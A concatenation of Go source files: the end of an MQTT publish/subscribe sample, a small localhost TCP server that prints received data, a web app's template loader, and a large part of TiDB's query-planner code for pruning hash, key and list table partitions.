		panic(err)
	}
	opts.SetDefaultPublishHandler(f)
	//create and start a client using the above ClientOptions
	c := MQTT.NewClient(opts)
	if token := c.Connect(); token.Wait() && token.Error() != nil {
		panic(token.Error())
	}
	//subscribe to the topic go-mqtt/sample and request messages to be delivered
	//at a maximum qos of zero, wait for the receipt to confirm the subscription
	if token := c.Subscribe("go-mqtt/sample", 0, nil); token.Wait() && token.Error() != nil {
		panic(token.Error())
	}
	//Publish 5 messages to go-mqtt/sample at qos 0 and wait for the receipt
	//from the server after sending each message
	for i := 0; i < 5; i++ {
		text := fmt.Sprintf("this is msg #%d!", i)
		token := c.Publish("go-mqtt/sample", 0, false, text)
		token.Wait()
	}
	// Give in-flight messages a moment to be delivered before tearing down.
	time.Sleep(3 * time.Second)
	//unsubscribe from go-mqtt/sample
	if token := c.Unsubscribe("go-mqtt/sample"); token.Wait() && token.Error() != nil {
		panic(token.Error())
	}
	c.Disconnect(250)
}
|
package main
import (
"fmt"
"net"
)
// HOST is the interface name the TCP server binds to.
const HOST = "localhost"
// PORT is the TCP port the server listens on.
const PORT = "52535"
// main starts a TCP listener on HOST:PORT and serves each accepted
// connection on its own goroutine.
func main() {
	fmt.Println("Starting Server")
	ln, err := net.Listen("tcp", HOST+":"+PORT)
	if err != nil {
		fmt.Println("Error Listening", err.Error())
		panic(err)
	}
	for {
		c, err := ln.Accept()
		if err != nil {
			fmt.Println("Error Accepting", err.Error())
			panic(err)
		}
		go handleConn(c)
	}
}
func handleConn(conn net.Conn) {
for {
buf := make([]byte, 1024)
byteNum, err := conn.Read(buf)
if err != nil {
fmt.Println("Error reading", err.Error())
}
fmt.Printf("Receivng data: %d,%v \r\n", byteNum, string(buf))
}
}
|
package main
import (
"html/template"
)
// tmpl maps a page name to its parsed template set (page + shared layout).
var tmpl = make(map[string]*template.Template)

// init parses every page template together with the common layout at program
// start, panicking (via template.Must) on any parse error.
func init() {
	pages := map[string]string{
		"index":          "templates/index.gohtml",
		"event-detail":   "templates/event-detail.gohtml",
		"about":          "templates/aboutpage.gohtml",
		"event-new":      "templates/event-new.gohtml",
		"event-search":   "templates/search.gohtml",
		"event-category": "templates/searchcategory.gohtml",
	}
	for name, file := range pages {
		tmpl[name] = template.Must(template.ParseFiles(file, "templates/layout.gohtml"))
	}
}
|
// Copyright 2018 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package core
import (
"bytes"
"cmp"
"context"
"fmt"
gomath "math"
"slices"
"sort"
"strings"
"github.com/pingcap/errors"
"github.com/pingcap/tidb/expression"
"github.com/pingcap/tidb/parser/ast"
"github.com/pingcap/tidb/parser/model"
"github.com/pingcap/tidb/parser/mysql"
"github.com/pingcap/tidb/sessionctx"
"github.com/pingcap/tidb/table"
"github.com/pingcap/tidb/table/tables"
"github.com/pingcap/tidb/types"
"github.com/pingcap/tidb/util/chunk"
"github.com/pingcap/tidb/util/collate"
"github.com/pingcap/tidb/util/mathutil"
"github.com/pingcap/tidb/util/plancodec"
"github.com/pingcap/tidb/util/ranger"
"github.com/pingcap/tidb/util/set"
)
// FullRange is a sentinel partition index meaning "all partitions are used"
// (pruning could not narrow the set down).
const FullRange = -1
// partitionProcessor rewrites the plan for table partition.
// Used by static partition prune mode.
/*
// create table t (id int) partition by range (id)
// (partition p1 values less than (10),
// partition p2 values less than (20),
// partition p3 values less than (30))
//
// select * from t is equal to
// select * from (union all
// select * from p1 where id < 10
// select * from p2 where id < 20
// select * from p3 where id < 30)
*/
// partitionProcessor is here because it's easier to prune partition after predicate push down.
type partitionProcessor struct{}
// optimize implements the logical optimization rule entry point: it rewrites
// every partitioned DataSource under lp according to static pruning.
func (s *partitionProcessor) optimize(_ context.Context, lp LogicalPlan, opt *logicalOptimizeOp) (LogicalPlan, error) {
	return s.rewriteDataSource(lp, opt)
}
// rewriteDataSource recursively replaces every partitioned DataSource under
// lp with its pruned form (a single partition scan, a partition union-all,
// or a dual table). LogicalCTE nodes are left untouched; every other node is
// traversed and its children spliced back in place.
func (s *partitionProcessor) rewriteDataSource(lp LogicalPlan, opt *logicalOptimizeOp) (LogicalPlan, error) {
	// Assert there will not be sel -> sel in the ast.
	switch p := lp.(type) {
	case *DataSource:
		return s.prune(p, opt)
	case *LogicalUnionScan:
		// A union scan sits directly on top of its DataSource child.
		ds := p.Children()[0]
		ds, err := s.prune(ds.(*DataSource), opt)
		if err != nil {
			return nil, err
		}
		if ua, ok := ds.(*LogicalPartitionUnionAll); ok {
			// Adjust the UnionScan->Union->DataSource1, DataSource2 ... to
			// Union->(UnionScan->DataSource1), (UnionScan->DataSource2)
			children := make([]LogicalPlan, 0, len(ua.Children()))
			for _, child := range ua.Children() {
				us := LogicalUnionScan{
					conditions: p.conditions,
					handleCols: p.handleCols,
				}.Init(ua.SCtx(), ua.SelectBlockOffset())
				us.SetChildren(child)
				children = append(children, us)
			}
			ua.SetChildren(children...)
			return ua, nil
		}
		// Only one partition, no union all.
		p.SetChildren(ds)
		return p, nil
	case *LogicalCTE:
		return lp, nil
	default:
		// Recurse into every child and splice the rewritten plans back in.
		children := lp.Children()
		for i, child := range children {
			newChild, err := s.rewriteDataSource(child, opt)
			if err != nil {
				return nil, err
			}
			children[i] = newChild
		}
	}
	return lp, nil
}
// partitionTable is implemented by tables that support partitioning; it
// exposes the table's partition expression metadata.
type partitionTable interface {
	PartitionExpr() *tables.PartitionExpr
}
// generateHashPartitionExpr parses the table's hash partition expression
// (pi.Expr) against the given columns/names and returns the resulting
// expression.
func generateHashPartitionExpr(ctx sessionctx.Context, pi *model.PartitionInfo, columns []*expression.Column, names types.NameSlice) (expression.Expression, error) {
	schema := expression.NewSchema(columns...)
	exprs, err := expression.ParseSimpleExprsWithNames(ctx, pi.Expr, schema, names)
	if err != nil {
		return nil, err
	}
	// Return value deliberately discarded — presumably called for the side
	// effect of warming the expression's hash-code cache; TODO confirm.
	exprs[0].HashCode(ctx.GetSessionVars().StmtCtx)
	return exprs[0], nil
}
// getPartColumnsForHashPartition extracts the columns referenced by the hash
// partition expression, re-indexes them 0..n-1, and pairs each with an
// unspecified prefix length.
func getPartColumnsForHashPartition(hashExpr expression.Expression) ([]*expression.Column, []int) {
	partCols := expression.ExtractColumns(hashExpr)
	colLen := make([]int, len(partCols))
	for i := range partCols {
		partCols[i].Index = i
		colLen[i] = types.UnspecifiedLength
	}
	return partCols, colLen
}
// getUsedHashPartitions returns the hash-partition indices that may contain
// rows matching conds, plus the filter conditions that remain after range
// detachment. A result of []int{FullRange} means pruning was not possible.
func (s *partitionProcessor) getUsedHashPartitions(ctx sessionctx.Context,
	tbl table.Table, partitionNames []model.CIStr, columns []*expression.Column,
	conds []expression.Expression, names types.NameSlice) ([]int, []expression.Expression, error) {
	pi := tbl.Meta().Partition
	hashExpr, err := generateHashPartitionExpr(ctx, pi, columns, names)
	if err != nil {
		return nil, nil, err
	}
	partCols, colLen := getPartColumnsForHashPartition(hashExpr)
	detachedResult, err := ranger.DetachCondAndBuildRangeForPartition(ctx, conds, partCols, colLen, ctx.GetSessionVars().RangeMaxSize)
	if err != nil {
		return nil, nil, err
	}
	ranges := detachedResult.Ranges
	used := make([]int, 0, len(ranges))
	for _, r := range ranges {
		if !r.IsPointNullable(ctx) {
			// Non-point range: try to enumerate the hash values it covers.
			// processing hash partition pruning. eg:
			// create table t2 (a int, b bigint, index (a), index (b)) partition by hash(a) partitions 10;
			// desc select * from t2 where t2.a between 10 and 15;
			// determine whether the partition key is int
			if col, ok := hashExpr.(*expression.Column); ok && col.RetType.EvalType() == types.ETInt {
				numPartitions := len(pi.Definitions)
				posHigh, highIsNull, err := hashExpr.EvalInt(ctx, chunk.MutRowFromDatums(r.HighVal).ToRow())
				if err != nil {
					return nil, nil, err
				}
				posLow, lowIsNull, err := hashExpr.EvalInt(ctx, chunk.MutRowFromDatums(r.LowVal).ToRow())
				if err != nil {
					return nil, nil, err
				}
				// consider whether the range is closed or open
				if r.LowExclude {
					posLow++
				}
				if r.HighExclude {
					posHigh--
				}
				var rangeScalar float64
				if mysql.HasUnsignedFlag(col.RetType.GetFlag()) {
					rangeScalar = float64(uint64(posHigh)) - float64(uint64(posLow)) // use float64 to avoid integer overflow
				} else {
					rangeScalar = float64(posHigh) - float64(posLow) // use float64 to avoid integer overflow
				}
				// if range is less than the number of partitions, there will be unused partitions we can prune out.
				if rangeScalar < float64(numPartitions) && !highIsNull && !lowIsNull {
					for i := posLow; i <= posHigh; i++ {
						idx := mathutil.Abs(i % int64(pi.Num))
						if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
							continue
						}
						used = append(used, int(idx))
					}
					continue
				}
				// issue:#22619
				if col.RetType.GetType() == mysql.TypeBit {
					// maximum number of partitions is 8192
					if col.RetType.GetFlen() > 0 && col.RetType.GetFlen() < int(gomath.Log2(mysql.PartitionCountLimit)) {
						// all possible hash values
						maxUsedPartitions := 1 << col.RetType.GetFlen()
						if maxUsedPartitions < numPartitions {
							for i := 0; i < maxUsedPartitions; i++ {
								used = append(used, i)
							}
							continue
						}
					}
				}
			}
			// Could not enumerate the range: fall back to scanning everything.
			used = []int{FullRange}
			break
		}
		if !r.HighVal[0].IsNull() {
			if len(r.HighVal) != len(partCols) {
				// Not all partition columns are fixed by this point: cannot prune.
				used = []int{-1} // -1 is the FullRange sentinel
				break
			}
		}
		// Point range: evaluate the hash expression on the point's values to
		// find the single partition it belongs to.
		highLowVals := make([]types.Datum, 0, len(r.HighVal)+len(r.LowVal))
		highLowVals = append(highLowVals, r.HighVal...)
		highLowVals = append(highLowVals, r.LowVal...)
		pos, isNull, err := hashExpr.EvalInt(ctx, chunk.MutRowFromDatums(highLowVals).ToRow())
		if err != nil {
			// If we failed to get the point position, we can just skip and ignore it.
			continue
		}
		if isNull {
			pos = 0
		}
		idx := mathutil.Abs(pos % int64(pi.Num))
		if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
			continue
		}
		used = append(used, int(idx))
	}
	return used, detachedResult.RemainedConds, nil
}
// getUsedKeyPartitions returns the key-partition indices that may contain
// rows matching conds, plus the filter conditions that remain after range
// detachment. A result of []int{FullRange} means pruning was not possible.
func (s *partitionProcessor) getUsedKeyPartitions(ctx sessionctx.Context,
	tbl table.Table, partitionNames []model.CIStr, columns []*expression.Column,
	conds []expression.Expression, _ types.NameSlice) ([]int, []expression.Expression, error) {
	pi := tbl.Meta().Partition
	partExpr := tbl.(partitionTable).PartitionExpr()
	partCols, colLen := partExpr.GetPartColumnsForKeyPartition(columns)
	pe := &tables.ForKeyPruning{KeyPartCols: partCols}
	detachedResult, err := ranger.DetachCondAndBuildRangeForPartition(ctx, conds, partCols, colLen, ctx.GetSessionVars().RangeMaxSize)
	if err != nil {
		return nil, nil, err
	}
	ranges := detachedResult.Ranges
	used := make([]int, 0, len(ranges))
	for _, r := range ranges {
		if !r.IsPointNullable(ctx) {
			// Non-point range over a single int partition column: enumerate
			// each value in the range and locate its partition.
			if len(partCols) == 1 && partCols[0].RetType.EvalType() == types.ETInt {
				col := partCols[0]
				posHigh, highIsNull, err := col.EvalInt(ctx, chunk.MutRowFromDatums(r.HighVal).ToRow())
				if err != nil {
					return nil, nil, err
				}
				posLow, lowIsNull, err := col.EvalInt(ctx, chunk.MutRowFromDatums(r.LowVal).ToRow())
				if err != nil {
					return nil, nil, err
				}
				// consider whether the range is closed or open
				if r.LowExclude {
					posLow++
				}
				if r.HighExclude {
					posHigh--
				}
				var rangeScalar float64
				if mysql.HasUnsignedFlag(col.RetType.GetFlag()) {
					rangeScalar = float64(uint64(posHigh)) - float64(uint64(posLow)) // use float64 to avoid integer overflow
				} else {
					rangeScalar = float64(posHigh) - float64(posLow) // use float64 to avoid integer overflow
				}
				// if range is less than the number of partitions, there will be unused partitions we can prune out.
				if rangeScalar < float64(pi.Num) && !highIsNull && !lowIsNull {
					for i := posLow; i <= posHigh; i++ {
						d := types.NewIntDatum(i)
						idx, err := pe.LocateKeyPartition(pi.Num, []types.Datum{d})
						if err != nil {
							// If we failed to get the point position, we can just skip and ignore it.
							continue
						}
						if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
							continue
						}
						used = append(used, idx)
					}
					continue
				}
			}
			// Could not enumerate the range: fall back to scanning everything.
			used = []int{FullRange}
			break
		}
		if len(r.HighVal) != len(partCols) {
			// Not all partition columns are fixed by this point: cannot prune.
			used = []int{FullRange}
			break
		}
		// Point range: locate the single partition the point belongs to.
		colVals := make([]types.Datum, 0, len(r.HighVal))
		colVals = append(colVals, r.HighVal...)
		idx, err := pe.LocateKeyPartition(pi.Num, colVals)
		if err != nil {
			// If we failed to get the point position, we can just skip and ignore it.
			continue
		}
		if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
			continue
		}
		used = append(used, idx)
	}
	return used, detachedResult.RemainedConds, nil
}
// getUsedPartitions dispatches partition pruning to the hash or key
// implementation depending on partType.
func (s *partitionProcessor) getUsedPartitions(ctx sessionctx.Context, tbl table.Table,
	partitionNames []model.CIStr, columns []*expression.Column, conds []expression.Expression,
	names types.NameSlice, partType model.PartitionType) ([]int, []expression.Expression, error) {
	switch partType {
	case model.PartitionTypeHash:
		return s.getUsedHashPartitions(ctx, tbl, partitionNames, columns, conds, names)
	default:
		return s.getUsedKeyPartitions(ctx, tbl, partitionNames, columns, conds, names)
	}
}
// findUsedPartitions returns the partition indices of a hash or key
// partitioned table that may match conds (sorted, de-duplicated), together
// with the filter conditions that must be kept after pruning.
func (s *partitionProcessor) findUsedPartitions(ctx sessionctx.Context,
	tbl table.Table, partitionNames []model.CIStr, conds []expression.Expression,
	columns []*expression.Column, names types.NameSlice) ([]int, []expression.Expression, error) {
	pi := tbl.Meta().Partition
	used, remainedConds, err := s.getUsedPartitions(ctx, tbl, partitionNames, columns, conds, names, pi.Type)
	if err != nil {
		return nil, nil, err
	}
	// A FullRange result combined with an explicit partition list still has
	// to honor that list, so expand and filter it.
	if len(partitionNames) > 0 && len(used) == 1 && used[0] == FullRange {
		or := partitionRangeOR{partitionRange{0, len(pi.Definitions)}}
		return s.convertToIntSlice(or, pi, partitionNames), nil, nil
	}
	// Sort then drop adjacent duplicates; slices.Compact replaces the
	// previous hand-rolled dedup loop with identical in-place semantics.
	slices.Sort(used)
	return slices.Compact(used), remainedConds, nil
}
// convertToIntSlice expands a partitionRangeOR into a list of partition
// indices, filtered by partitionNames when that list is non-empty. A full
// range with no name filter collapses to the FullRange sentinel.
func (s *partitionProcessor) convertToIntSlice(or partitionRangeOR, pi *model.PartitionInfo, partitionNames []model.CIStr) []int {
	if len(partitionNames) == 0 && len(or) == 1 && or[0].start == 0 && or[0].end == len(pi.Definitions) {
		return []int{FullRange}
	}
	ret := make([]int, 0, len(or))
	for _, rng := range or {
		for pos := rng.start; pos < rng.end; pos++ {
			if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[pos].Name.L) {
				continue
			}
			ret = append(ret, pos)
		}
	}
	return ret
}
// convertToRangeOr converts a pruned partition index list into a
// partitionRangeOR of single-partition ranges. A lone FullRange sentinel
// expands to the whole partition set.
func convertToRangeOr(used []int, pi *model.PartitionInfo) partitionRangeOR {
	// Use the named FullRange constant instead of a bare -1 so this stays in
	// sync with the producers of the sentinel value elsewhere in this file.
	if len(used) == 1 && used[0] == FullRange {
		return fullRange(len(pi.Definitions))
	}
	ret := make(partitionRangeOR, 0, len(used))
	for _, i := range used {
		ret = append(ret, partitionRange{i, i + 1})
	}
	return ret
}
// pruneHashOrKeyPartition returns the used partition indices of a hash or
// key partitioned table, discarding the remained filter conditions.
func (s *partitionProcessor) pruneHashOrKeyPartition(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr,
	conds []expression.Expression, columns []*expression.Column, names types.NameSlice) ([]int, error) {
	used, _, err := s.findUsedPartitions(ctx, tbl, partitionNames, conds, columns, names)
	return used, err
}
// reconstructTableColNames rebuilds FieldNames for every column in
// ds.TblCols. ds.names cannot be used directly because it is pruned while
// ds.TblCols still carries all original columns; see
// https://github.com/pingcap/tidb/issues/22635 for details.
func (*partitionProcessor) reconstructTableColNames(ds *DataSource) ([]*types.FieldName, error) {
	// DeletableCols covers every column, including ones invisible to reads.
	colsInfo := ds.table.DeletableCols()
	colsInfoMap := make(map[int64]*table.Column, len(colsInfo))
	for _, c := range colsInfo {
		colsInfoMap[c.ID] = c
	}
	names := make([]*types.FieldName, 0, len(ds.TblCols))
	for _, colExpr := range ds.TblCols {
		switch colExpr.ID {
		case model.ExtraHandleID:
			names = append(names, &types.FieldName{
				DBName:      ds.DBName,
				TblName:     ds.tableInfo.Name,
				ColName:     model.ExtraHandleName,
				OrigColName: model.ExtraHandleName,
			})
		case model.ExtraPidColID:
			names = append(names, &types.FieldName{
				DBName:      ds.DBName,
				TblName:     ds.tableInfo.Name,
				ColName:     model.ExtraPartitionIdName,
				OrigColName: model.ExtraPartitionIdName,
			})
		case model.ExtraPhysTblID:
			names = append(names, &types.FieldName{
				DBName:      ds.DBName,
				TblName:     ds.tableInfo.Name,
				ColName:     model.ExtraPhysTblIdName,
				OrigColName: model.ExtraPhysTblIdName,
			})
		default:
			colInfo, found := colsInfoMap[colExpr.ID]
			if !found {
				return nil, errors.Trace(fmt.Errorf("information of column %v is not found", colExpr.String()))
			}
			names = append(names, &types.FieldName{
				DBName:      ds.DBName,
				TblName:     ds.tableInfo.Name,
				ColName:     colInfo.Name,
				OrigTblName: ds.tableInfo.Name,
				OrigColName: colInfo.Name,
			})
		}
	}
	return names, nil
}
// processHashOrKeyPartition prunes a hash/key partitioned DataSource and
// rewrites it into a union of per-partition scans, or an empty dual table
// when no partition can possibly match.
func (s *partitionProcessor) processHashOrKeyPartition(ds *DataSource, pi *model.PartitionInfo, opt *logicalOptimizeOp) (LogicalPlan, error) {
	names, err := s.reconstructTableColNames(ds)
	if err != nil {
		return nil, err
	}
	used, err := s.pruneHashOrKeyPartition(ds.SCtx(), ds.table, ds.partitionNames, ds.allConds, ds.TblCols, names)
	if err != nil {
		return nil, err
	}
	if used == nil {
		// Nothing can match: replace the scan with an empty dual table.
		dual := LogicalTableDual{RowCount: 0}.Init(ds.SCtx(), ds.SelectBlockOffset())
		dual.schema = ds.Schema()
		appendNoPartitionChildTraceStep(ds, dual, opt)
		return dual, nil
	}
	return s.makeUnionAllChildren(ds, pi, convertToRangeOr(used, pi), opt)
}
// listPartitionPruner prunes partitions for LIST and LIST COLUMNS
// partitioned tables.
type listPartitionPruner struct {
	*partitionProcessor
	ctx sessionctx.Context
	pi *model.PartitionInfo
	partitionNames []model.CIStr
	// fullRange is the pre-built "all partitions" result: {FullRange: {}}.
	fullRange map[int]struct{}
	// listPrune is a rebound clone of the table's list pruning metadata.
	listPrune *tables.ForListPruning
}
// newListPartitionPruner clones pruneList, rebinds the UniqueIDs of its
// pruning columns to the matching entries in columns, and wraps everything
// in a ready-to-use pruner.
func newListPartitionPruner(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr, s *partitionProcessor, pruneList *tables.ForListPruning, columns []*expression.Column) *listPartitionPruner {
	// Work on a clone so shared table metadata is never mutated.
	pruneList = pruneList.Clone()
	for i := range pruneList.PruneExprCols {
		for _, c := range columns {
			if c.ID == pruneList.PruneExprCols[i].ID {
				pruneList.PruneExprCols[i].UniqueID = c.UniqueID
				break
			}
		}
	}
	for i := range pruneList.ColPrunes {
		for _, c := range columns {
			if c.ID == pruneList.ColPrunes[i].ExprCol.ID {
				pruneList.ColPrunes[i].ExprCol.UniqueID = c.UniqueID
				break
			}
		}
	}
	return &listPartitionPruner{
		partitionProcessor: s,
		ctx:                ctx,
		pi:                 tbl.Meta().Partition,
		partitionNames:     partitionNames,
		fullRange:          map[int]struct{}{FullRange: {}},
		listPrune:          pruneList,
	}
}
// locatePartition returns the partition locations matched by cond.
// The second return value means "cannot prune, use all partitions";
// a nil location with (false, nil) means "no partition matches at all".
func (l *listPartitionPruner) locatePartition(cond expression.Expression) (tables.ListPartitionLocation, bool, error) {
	switch sf := cond.(type) {
	case *expression.Constant:
		b, err := sf.Value.ToBool(l.ctx.GetSessionVars().StmtCtx)
		if err == nil && b == 0 {
			// A constant false expression.
			return nil, false, nil
		}
	case *expression.ScalarFunction:
		switch sf.FuncName.L {
		case ast.LogicOr:
			// OR: union the locations of the flattened DNF items.
			dnfItems := expression.FlattenDNFConditions(sf)
			return l.locatePartitionByDNFCondition(dnfItems)
		case ast.LogicAnd:
			// AND: intersect the locations of the flattened CNF items.
			cnfItems := expression.FlattenCNFConditions(sf)
			return l.locatePartitionByCNFCondition(cnfItems)
		}
		// Any other function: try single-column pruning.
		return l.locatePartitionByColumn(sf)
	}
	// Anything else (including a constant true) cannot prune.
	return nil, true, nil
}
// locatePartitionByCNFCondition intersects the partition locations of every
// CNF item. Items that cannot prune ("full") are skipped; if all items are
// full the whole result is full. An empty intersection means no partition
// can match.
func (l *listPartitionPruner) locatePartitionByCNFCondition(conds []expression.Expression) (tables.ListPartitionLocation, bool, error) {
	if len(conds) == 0 {
		return nil, true, nil
	}
	countFull := 0
	helper := tables.NewListPartitionLocationHelper()
	for _, cond := range conds {
		cnfLoc, isFull, err := l.locatePartition(cond)
		if err != nil {
			return nil, false, err
		}
		if isFull {
			countFull++
			continue
		}
		if cnfLoc.IsEmpty() {
			// No partition for intersection, just return no partitions.
			return nil, false, nil
		}
		if !helper.Intersect(cnfLoc) {
			return nil, false, nil
		}
	}
	if countFull == len(conds) {
		// Every item was un-prunable: fall back to all partitions.
		return nil, true, nil
	}
	return helper.GetLocation(), false, nil
}
// locatePartitionByDNFCondition unions the partition locations of every DNF
// item. Any error or un-prunable ("full") item aborts with that result.
func (l *listPartitionPruner) locatePartitionByDNFCondition(conds []expression.Expression) (tables.ListPartitionLocation, bool, error) {
	if len(conds) == 0 {
		return nil, true, nil
	}
	helper := tables.NewListPartitionLocationHelper()
	for _, item := range conds {
		loc, isFull, err := l.locatePartition(item)
		if err != nil {
			return nil, isFull, err
		}
		if isFull {
			return nil, true, nil
		}
		helper.Union(loc)
	}
	return helper.GetLocation(), false, nil
}
// locatePartitionByColumn locates partitions from a condition that
// references exactly one list column.
// Such as: partition by list columns(a,b) (partition p0 values in ((1,1),(2,2)), partition p1 values in ((6,6),(7,7)));
// if the condition is `a=1`, we can use it with the column's pruning
// metadata to locate partition `p0`. Returns (nil, true, nil) when pruning
// is impossible for this condition.
func (l *listPartitionPruner) locatePartitionByColumn(cond *expression.ScalarFunction) (tables.ListPartitionLocation, bool, error) {
	condCols := expression.ExtractColumns(cond)
	if len(condCols) != 1 {
		return nil, true, nil
	}
	for _, cp := range l.listPrune.ColPrunes {
		if cp.ExprCol.ID == condCols[0].ID {
			return l.locateColumnPartitionsByCondition(cond, cp)
		}
	}
	// No pruning metadata for this column: cannot prune.
	return nil, true, nil
}
// locateColumnPartitionsByCondition builds ranges for cond over a single
// list column and maps each range to partition locations, handling the
// DEFAULT partition where declared. The middle return value means "cannot
// prune" (e.g. multi-value ranges or overflow during location).
func (l *listPartitionPruner) locateColumnPartitionsByCondition(cond expression.Expression, colPrune *tables.ForListColumnPruning) (tables.ListPartitionLocation, bool, error) {
	ranges, err := l.detachCondAndBuildRange([]expression.Expression{cond}, colPrune.ExprCol)
	if err != nil {
		return nil, false, err
	}
	sc := l.ctx.GetSessionVars().StmtCtx
	helper := tables.NewListPartitionLocationHelper()
	for _, r := range ranges {
		if len(r.LowVal) != 1 || len(r.HighVal) != 1 {
			// Not a single-column range: cannot prune.
			return nil, true, nil
		}
		var locations []tables.ListPartitionLocation
		if r.IsPointNullable(l.ctx) {
			// Point value: locate the exact partition.
			location, err := colPrune.LocatePartition(sc, r.HighVal[0])
			if types.ErrOverflow.Equal(err) {
				return nil, true, nil // return full-scan if over-flow
			}
			if err != nil {
				return nil, false, err
			}
			if colPrune.HasDefault() {
				// A DEFAULT partition may also hold matching rows; add it as
				// a special group when the point missed or other columns are
				// involved.
				if location == nil || len(l.listPrune.ColPrunes) > 1 {
					if location != nil {
						locations = append(locations, location)
					}
					location = tables.ListPartitionLocation{
						tables.ListPartitionGroup{
							PartIdx: l.listPrune.GetDefaultIdx(),
							GroupIdxs: []int{-1}, // Special group!
						},
					}
				}
			}
			locations = append(locations, location)
		} else {
			// Interval: collect every partition the range may touch.
			locations, err = colPrune.LocateRanges(sc, r, l.listPrune.GetDefaultIdx())
			if types.ErrOverflow.Equal(err) {
				return nil, true, nil // return full-scan if over-flow
			}
			if err != nil {
				return nil, false, err
			}
			if colPrune.HasDefault() /* && len(l.listPrune.ColPrunes) > 1 */ {
				locations = append(locations,
					tables.ListPartitionLocation{
						tables.ListPartitionGroup{
							PartIdx: l.listPrune.GetDefaultIdx(),
							GroupIdxs: []int{-1}, // Special group!
						},
					})
			}
		}
		// Union the locations, honoring any explicit partition-name filter.
		for _, location := range locations {
			if len(l.partitionNames) > 0 {
				for _, pg := range location {
					if l.findByName(l.partitionNames, l.pi.Definitions[pg.PartIdx].Name.L) {
						helper.UnionPartitionGroup(pg)
					}
				}
			} else {
				helper.Union(location)
			}
		}
	}
	return helper.GetLocation(), false, nil
}
// detachCondAndBuildRange builds ranges for conds over clones of exprCols,
// using unspecified prefix lengths for every column.
func (l *listPartitionPruner) detachCondAndBuildRange(conds []expression.Expression, exprCols ...*expression.Column) ([]*ranger.Range, error) {
	cols := make([]*expression.Column, 0, len(exprCols))
	colLen := make([]int, 0, len(exprCols))
	for _, original := range exprCols {
		// Clone so range building cannot mutate the caller's columns.
		cols = append(cols, original.Clone().(*expression.Column))
		colLen = append(colLen, types.UnspecifiedLength)
	}
	res, err := ranger.DetachCondAndBuildRangeForPartition(l.ctx, conds, cols, colLen, l.ctx.GetSessionVars().RangeMaxSize)
	if err != nil {
		return nil, err
	}
	return res.Ranges, nil
}
// findUsedListColumnsPartitions prunes a LIST COLUMNS partitioned table by
// treating conds as a CNF. It returns the pre-built full-range set when
// pruning is impossible.
func (l *listPartitionPruner) findUsedListColumnsPartitions(conds []expression.Expression) (map[int]struct{}, error) {
	if len(conds) == 0 {
		return l.fullRange, nil
	}
	location, isFull, err := l.locatePartitionByCNFCondition(conds)
	switch {
	case err != nil:
		return nil, err
	case isFull:
		return l.fullRange, nil
	}
	used := make(map[int]struct{}, len(location))
	for _, group := range location {
		used[group.PartIdx] = struct{}{}
	}
	return used, nil
}
// findUsedListPartitions prunes a LIST (single expression) partitioned table
// by building point ranges for conds and evaluating the partition expression
// on each point. It returns the pre-built full-range set when pruning is
// impossible (no conds, non-point range, or partial column coverage).
func (l *listPartitionPruner) findUsedListPartitions(conds []expression.Expression) (map[int]struct{}, error) {
	if len(conds) == 0 {
		return l.fullRange, nil
	}
	exprCols := l.listPrune.PruneExprCols
	pruneExpr := l.listPrune.PruneExpr
	ranges, err := l.detachCondAndBuildRange(conds, exprCols...)
	if err != nil {
		return nil, err
	}
	used := make(map[int]struct{}, len(ranges))
	for _, r := range ranges {
		if !r.IsPointNullable(l.ctx) {
			// Only point ranges can be located exactly; anything else
			// forces a full scan.
			return l.fullRange, nil
		}
		if len(r.HighVal) != len(exprCols) {
			return l.fullRange, nil
		}
		value, isNull, err := pruneExpr.EvalInt(l.ctx, chunk.MutRowFromDatums(r.HighVal).ToRow())
		if err != nil {
			return nil, err
		}
		partitionIdx := l.listPrune.LocatePartition(value, isNull)
		if partitionIdx == -1 {
			// No partition holds this value.
			continue
		}
		if len(l.partitionNames) > 0 && !l.findByName(l.partitionNames, l.pi.Definitions[partitionIdx].Name.L) {
			continue
		}
		used[partitionIdx] = struct{}{}
	}
	return used, nil
}
// findUsedListPartitions prunes a LIST / LIST COLUMNS partitioned table and
// returns the sorted indexes of the partitions that may contain matches.
func (s *partitionProcessor) findUsedListPartitions(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr,
	conds []expression.Expression, columns []*expression.Column) ([]int, error) {
	pi := tbl.Meta().Partition
	partExpr := tbl.(partitionTable).PartitionExpr()
	listPruner := newListPartitionPruner(ctx, tbl, partitionNames, s, partExpr.ForListPruning, columns)
	var (
		used map[int]struct{}
		err  error
	)
	// LIST COLUMNS tables carry per-column pruners; plain LIST tables use the
	// single pruning-expression path.
	if partExpr.ForListPruning.ColPrunes == nil {
		used, err = listPruner.findUsedListPartitions(conds)
	} else {
		used, err = listPruner.findUsedListColumnsPartitions(conds)
	}
	if err != nil {
		return nil, err
	}
	if _, ok := used[FullRange]; ok {
		// Pruning failed: every partition remains a candidate.
		or := partitionRangeOR{partitionRange{0, len(pi.Definitions)}}
		return s.convertToIntSlice(or, pi, partitionNames), nil
	}
	ret := make([]int, 0, len(used))
	for idx := range used {
		ret = append(ret, idx)
	}
	slices.Sort(ret)
	return ret, nil
}
// pruneListPartition returns the indexes of the LIST partitions that may
// contain rows matching conds. It is a thin wrapper around
// findUsedListPartitions; the previous explicit error check added nothing,
// so the result is forwarded directly.
func (s *partitionProcessor) pruneListPartition(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr,
	conds []expression.Expression, columns []*expression.Column) ([]int, error) {
	return s.findUsedListPartitions(ctx, tbl, partitionNames, conds, columns)
}
// prune rewrites a partitioned-table DataSource into a plan that only reads
// the partitions the conditions can possibly match. Non-partitioned tables
// are returned untouched.
